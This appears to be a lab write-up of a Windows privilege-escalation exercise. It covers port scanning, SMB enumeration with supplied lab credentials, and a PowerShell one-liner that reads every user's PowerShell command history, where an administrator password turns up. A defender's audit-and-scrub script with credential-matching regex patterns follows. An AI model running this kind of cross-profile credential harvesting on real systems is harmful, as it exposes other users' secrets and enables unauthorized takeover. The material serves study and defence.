Objective and Scope
Following a successful social engineering engagement, you have obtained user-level credentials for a corporate workstation. Your objective is to leverage this initial access to perform deep reconnaissance on the internal Windows host. The final goal is to escalate privileges and capture the root flag from the administrator’s directory to demonstrate full system compromise.
tyler.ramsey:P@ssw0rd!
Network Enumeration
sudo nmap -p- --min-rate 1500 --max-rtt-timeout 500ms --max-retries 3 --open -T4 -Pn -v -oN quick_tcp_scan 10.1.126.16
PORT STATE SERVICE
135/tcp open msrpc
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
49669/tcp open unknown
sudo nmap -p 135,445,3389,49669 -A -oN detailed_scan -oX detailed_scan.xml 10.1.126.16
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds?
3389/tcp open ms-wbt-server
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=EC2AMAZ-M1LFCNO
| Not valid before: 2025-09-29T10:51:47
|_Not valid after: 2026-03-31T10:51:47
| rdp-ntlm-info:
| Target_Name: EC2AMAZ-M1LFCNO
| NetBIOS_Domain_Name: EC2AMAZ-M1LFCNO
| NetBIOS_Computer_Name: EC2AMAZ-M1LFCNO
| DNS_Domain_Name: EC2AMAZ-M1LFCNO
| DNS_Computer_Name: EC2AMAZ-M1LFCNO
| Product_Version: 10.0.26100
|_ System_Time: 2025-11-11T08:28:48+00:00
49669/tcp open msrpc Microsoft Windows RPC
SMB Enumeration
nxc smb 10.1.126.16 -u tyler.ramsey -p 'P@ssw0rd!' --shares
SMB 10.1.126.16 445 EC2AMAZ-M1LFCNO [*] Windows 10.0 Build 26100 x64 (name:EC2AMAZ-M1LFCNO) (domain:EC2AMAZ-M1LFCNO) (signing:False) (SMBv1:False)
SMB 10.1.126.16 445 EC2AMAZ-M1LFCNO [+] EC2AMAZ-M1LFCNO\tyler.ramsey:P@ssw0rd!
SMB 10.1.126.16 445 EC2AMAZ-M1LFCNO [*] Enumerated shares
SMB 10.1.126.16 445 EC2AMAZ-M1LFCNO Share Permissions Remark
SMB 10.1.126.16 445 EC2AMAZ-M1LFCNO ----- ----------- ------
SMB 10.1.126.16 445 EC2AMAZ-M1LFCNO ADMIN$ Remote Admin
SMB 10.1.126.16 445 EC2AMAZ-M1LFCNO C$ Default share
SMB 10.1.126.16 445 EC2AMAZ-M1LFCNO IPC$ READ Remote IPC
Nothing of interest in the shares: the only one this account can read is IPC$, and ADMIN$ and C$ are not accessible to it.
Foothold via RDP
Once logged in over RDP (3389/tcp) with the tyler.ramsey credentials, standard local enumeration turns up the plaintext password of the administrator account in a PowerShell command history file.
I got this useful PowerShell script from the following Medium article:
# Read every user's PSReadLine history file; profiles without one are skipped silently
foreach($user in ((ls C:\users).fullname)){cat "$user\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt" -ErrorAction SilentlyContinue}
Output (the first line is the command that set the administrator password; the value is masked in this writeup):
net user administrator "xxxxxxxxxxxxxxxxxx"
whoami /priv
ls
tree /f
clsa
Get-Process | Format-Table -AutoSize
set
Get-WmiObject -Class Win32_Product | select Name, Version
Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | select *
reg query "HKLM\SOFTWARE\microsoft\windows nt\currentversion\winlogon"
foreach($user in ((ls C:\users).fullname)){cat "$user\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt" -ErrorAction SilentlyContinue}
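The exposure above is a hygiene failure rather than a software bug: PSReadLine writes every accepted command line, including a `net user <name> <password>`, to a per-user text file that any process running as that user (or an administrator) can read. The following is an added example, not part of the writeup or the linked Medium article, of how a defender would audit a host for this condition, scrub what is found, and stop it recurring. It assumes the account running it can read the other profiles under C:\Users, and the regex list is an illustrative starting point rather than a complete one.

```powershell
# Added example (not from the writeup): audit PSReadLine history files for commands that
# embed a credential, optionally scrub the flagged lines, and register a handler so such
# lines are never persisted again. Assumes read access to the profiles under C:\Users.

$credentialPatterns = @(
    'net\s+user\s+\S+\s+\S+',                        # net user <name> <password>
    'ConvertTo-SecureString\s.*-AsPlainText',        # plaintext secret wrapped as SecureString
    '-(Password|Secret|Key|Token)\s+\S+',            # cmdlet parameters that carry a secret
    '(pass(word)?|pwd|secret|token)\s*[:=]\s*\S+'    # key=value style secrets
)

$historyRelativePath = 'AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt'

function Get-HistoryCredentialFindings {
    param(
        [string]$ProfileRoot = 'C:\Users',
        [string[]]$Patterns = $credentialPatterns
    )
    foreach ($userDir in Get-ChildItem -Path $ProfileRoot -Directory -ErrorAction SilentlyContinue) {
        $historyFile = Join-Path $userDir.FullName $historyRelativePath
        if (-not (Test-Path -LiteralPath $historyFile)) { continue }
        $lineNo = 0
        foreach ($line in Get-Content -LiteralPath $historyFile -ErrorAction SilentlyContinue) {
            $lineNo++
            foreach ($pattern in $Patterns) {
                if ($line -match $pattern) {
                    [pscustomobject]@{
                        User    = $userDir.Name
                        File    = $historyFile
                        Line    = $lineNo
                        Pattern = $pattern
                        Command = $line
                    }
                    break   # one finding per line is enough
                }
            }
        }
    }
}

function Remove-HistoryCredentialLines {
    # Rewrites each flagged history file without the flagged lines; -WhatIf previews only.
    [CmdletBinding(SupportsShouldProcess)]
    param([string[]]$Patterns = $credentialPatterns)
    $byFile = Get-HistoryCredentialFindings -Patterns $Patterns | Group-Object -Property File
    foreach ($group in $byFile) {
        $path = $group.Name
        $kept = Get-Content -LiteralPath $path | Where-Object {
            $candidate = $_
            -not ($Patterns | Where-Object { $candidate -match $_ })
        }
        if ($PSCmdlet.ShouldProcess($path, "remove $($group.Count) credential-bearing line(s)")) {
            Set-Content -LiteralPath $path -Value $kept
        }
    }
}

# 1. Report what anyone with read access to the profiles could see.
$findings = Get-HistoryCredentialFindings
if ($findings) {
    $findings | Format-Table User, Line, Pattern, Command -AutoSize
} else {
    Write-Host 'No credential-looking commands found in any PSReadLine history file.'
}

# 2. Scrub them (dry run first; drop -WhatIf to apply). Every credential found must also be
#    rotated: a password that was written to a plain text file has to be treated as exposed.
Remove-HistoryCredentialLines -WhatIf

# 3. Prevent recurrence for the current user: refuse to persist any line matching the same
#    patterns. Put this in $PROFILE so every new session inherits it. GetNewClosure() keeps
#    $credentialPatterns available after the script scope is gone. The blunt alternative is
#    Set-PSReadLineOption -HistorySaveStyle SaveNothing.
Set-PSReadLineOption -AddToHistoryHandler {
    param([string]$line)
    foreach ($pattern in $credentialPatterns) {
        if ($line -match $pattern) { return $false }
    }
    return $true
}.GetNewClosure()
```

Run it from an elevated PowerShell session so every profile is readable. Recent PSReadLine releases already skip lines containing keywords such as `password` or `token` by default, but a `net user <name> <password>` line contains neither, which is exactly the form that leaked the administrator password on this host; that is why a handler keyed on command shape, or `SaveNothing` for administrative accounts, is worth setting rather than relying on the default filter.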